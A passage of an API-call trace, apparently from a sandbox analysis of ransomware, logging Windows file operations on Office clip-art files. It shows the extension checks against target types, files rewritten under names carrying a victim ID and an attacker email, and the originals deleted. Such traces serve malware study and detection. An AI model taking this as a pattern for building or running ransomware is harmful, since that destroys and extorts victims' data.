(lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63 [0273.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63 [0273.237] lstrlenW (lpString=".doc") returned 4 [0273.237] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.237] lstrlenW (lpString=".docx") returned 5 [0273.237] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.237] lstrlenW (lpString=".pdf") returned 4 [0273.237] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.237] lstrlenW (lpString=".xls") returned 4 [0273.237] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.237] lstrlenW (lpString=".xlsx") returned 5 [0273.237] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.237] lstrlenW (lpString=".ppt") returned 4 [0273.237] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63 [0273.237] lstrlenW (lpString=".zip") returned 4 [0273.237] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.237] lstrlenW (lpString=".rar") returned 4 [0273.237] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.237] lstrlenW (lpString=".bz2") returned 4 [0273.237] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.237] lstrlenW (lpString=".7z") returned 3 [0273.237] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63 [0273.237] lstrlenW (lpString=".dbf") returned 4 [0273.237] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63 [0273.237] lstrlenW (lpString=".1cd") returned 4 [0273.238] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63 [0273.238] lstrlenW (lpString=".jpg") returned 4 [0273.238] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63 [0273.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63 [0273.238] lstrlenW (lpString=".doc") returned 4 [0273.238] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.238] lstrlenW (lpString=".docx") returned 5 [0273.238] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.238] lstrlenW (lpString=".pdf") returned 4 [0273.238] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.238] lstrlenW (lpString=".xls") returned 4 [0273.238] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.238] lstrlenW (lpString=".xlsx") returned 5 [0273.238] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.238] lstrlenW (lpString=".ppt") returned 4 [0273.238] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63 [0273.238] lstrlenW (lpString=".zip") returned 4 [0273.238] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.238] lstrlenW (lpString=".rar") returned 4 [0273.238] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.238] lstrlenW (lpString=".bz2") returned 4 [0273.238] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.238] lstrlenW (lpString=".7z") returned 3 [0273.238] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63 [0273.238] lstrlenW (lpString=".dbf") returned 4 [0273.239] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63 [0273.239] lstrlenW (lpString=".1cd") returned 4 [0273.239] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 63 [0273.239] lstrlenW (lpString=".jpg") returned 4 [0273.239] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.239] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.239] lstrlenW (lpString="IN00118_.WMF") returned 12 [0273.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0273.246] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=792) returned 1 [0273.246] CloseHandle (hObject=0x328) returned 1 [0273.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf")) returned 0x20 [0273.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.255] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.255] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.256] GetLastError () returned 0x0 [0273.256] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x318, lpOverlapped=0x0) returned 1 [0273.258] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x320, lpOverlapped=0x0) returned 1 [0273.258] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.259] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.259] SetEndOfFile (hFile=0x2bc) returned 1 [0273.259] CloseHandle (hObject=0x2bc) returned 1 [0273.259] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.259] SetEndOfFile (hFile=0x388) returned 1 [0273.260] CloseHandle (hObject=0x388) returned 1 [0273.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.261] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf")) returned 1 [0273.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63 [0273.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63 [0273.261] lstrlenW (lpString=".doc") returned 4 [0273.261] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.261] lstrlenW (lpString=".docx") returned 5 [0273.261] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.261] lstrlenW (lpString=".pdf") returned 4 [0273.261] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.261] lstrlenW (lpString=".xls") returned 4 [0273.261] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.261] lstrlenW (lpString=".xlsx") returned 5 [0273.261] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.261] lstrlenW (lpString=".ppt") returned 4 [0273.261] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63 [0273.261] lstrlenW (lpString=".zip") returned 4 [0273.261] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.261] lstrlenW (lpString=".rar") returned 4 [0273.261] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.261] lstrlenW (lpString=".bz2") returned 4 [0273.262] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.262] lstrlenW (lpString=".7z") returned 3 [0273.262] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63 [0273.262] lstrlenW (lpString=".dbf") returned 4 [0273.262] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63 [0273.262] lstrlenW (lpString=".1cd") returned 4 [0273.262] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63 [0273.262] lstrlenW (lpString=".jpg") returned 4 [0273.262] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63 [0273.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63 [0273.262] lstrlenW (lpString=".doc") returned 4 [0273.262] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.262] lstrlenW (lpString=".docx") returned 5 [0273.262] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.262] lstrlenW (lpString=".pdf") returned 4 [0273.262] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.262] lstrlenW (lpString=".xls") returned 4 [0273.262] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.262] lstrlenW (lpString=".xlsx") returned 5 [0273.262] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.262] lstrlenW (lpString=".ppt") returned 4 [0273.262] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63 [0273.262] lstrlenW (lpString=".zip") returned 4 [0273.262] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.262] lstrlenW (lpString=".rar") returned 4 [0273.263] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.263] lstrlenW (lpString=".bz2") returned 4 [0273.263] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.263] lstrlenW (lpString=".7z") returned 3 [0273.263] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63 [0273.263] lstrlenW (lpString=".dbf") returned 4 [0273.263] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63 [0273.263] lstrlenW (lpString=".1cd") returned 4 [0273.263] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63 [0273.263] lstrlenW (lpString=".jpg") returned 4 [0273.263] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.263] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.263] lstrlenW (lpString="IN00177_.WMF") returned 12 [0273.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.263] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=1074) returned 1 [0273.263] CloseHandle (hObject=0x388) returned 1 [0273.264] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf")) returned 0x20 [0273.264] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.264] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.264] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.264] GetLastError () returned 0x0 [0273.264] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x432, lpOverlapped=0x0) returned 1 [0273.266] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x440, lpOverlapped=0x0) returned 1 [0273.267] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.267] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.267] SetEndOfFile (hFile=0x2bc) returned 1 [0273.267] CloseHandle (hObject=0x2bc) returned 1 [0273.267] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.267] SetEndOfFile (hFile=0x388) returned 1 [0273.268] CloseHandle (hObject=0x388) returned 1 [0273.269] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.269] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf")) returned 1 [0273.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63 [0273.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63 [0273.269] lstrlenW (lpString=".doc") returned 4 [0273.269] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.269] lstrlenW (lpString=".docx") returned 5 [0273.269] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.269] lstrlenW (lpString=".pdf") returned 4 [0273.269] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.269] lstrlenW (lpString=".xls") returned 4 [0273.269] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.269] lstrlenW (lpString=".xlsx") returned 5 [0273.269] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.269] lstrlenW (lpString=".ppt") returned 4 [0273.269] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63 [0273.269] lstrlenW (lpString=".zip") returned 4 [0273.269] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.269] lstrlenW (lpString=".rar") returned 4 [0273.269] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.269] lstrlenW (lpString=".bz2") returned 4 [0273.270] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.270] lstrlenW (lpString=".7z") returned 3 [0273.270] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63 [0273.270] lstrlenW (lpString=".dbf") returned 4 [0273.270] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63 [0273.270] lstrlenW (lpString=".1cd") returned 4 [0273.270] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63 [0273.270] lstrlenW (lpString=".jpg") returned 4 [0273.270] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63 [0273.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63 [0273.270] lstrlenW (lpString=".doc") returned 4 [0273.270] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.270] lstrlenW (lpString=".docx") returned 5 [0273.270] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.270] lstrlenW (lpString=".pdf") returned 4 [0273.270] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.270] lstrlenW (lpString=".xls") returned 4 [0273.270] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.270] lstrlenW (lpString=".xlsx") returned 5 [0273.270] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.270] lstrlenW (lpString=".ppt") returned 4 [0273.270] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63 [0273.270] lstrlenW (lpString=".zip") returned 4 [0273.270] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.270] lstrlenW (lpString=".rar") returned 4 [0273.270] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.271] lstrlenW (lpString=".bz2") returned 4 [0273.271] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.271] lstrlenW (lpString=".7z") returned 3 [0273.271] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63 [0273.271] lstrlenW (lpString=".dbf") returned 4 [0273.271] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63 [0273.271] lstrlenW (lpString=".1cd") returned 4 [0273.271] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63 [0273.271] lstrlenW (lpString=".jpg") returned 4 [0273.271] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.271] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.271] lstrlenW (lpString="IN00204_.WMF") returned 12 [0273.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.271] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=1848) returned 1 [0273.271] CloseHandle (hObject=0x388) returned 1 [0273.271] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf")) returned 0x20 [0273.272] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.272] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.272] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.272] GetLastError () returned 0x0 [0273.272] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x738, lpOverlapped=0x0) returned 1 [0273.509] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x740, lpOverlapped=0x0) returned 1 [0273.510] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.510] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.510] SetEndOfFile (hFile=0x2bc) returned 1 [0273.510] CloseHandle (hObject=0x2bc) returned 1 [0273.510] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.510] SetEndOfFile (hFile=0x388) returned 1 [0273.511] CloseHandle (hObject=0x388) returned 1 [0273.512] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.512] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf")) returned 1 [0273.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63 [0273.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63 [0273.512] lstrlenW (lpString=".doc") returned 4 [0273.512] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.512] lstrlenW (lpString=".docx") returned 5 [0273.512] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.512] lstrlenW (lpString=".pdf") returned 4 [0273.512] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.512] lstrlenW (lpString=".xls") returned 4 [0273.512] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.512] lstrlenW (lpString=".xlsx") returned 5 [0273.512] lstrcmpiW 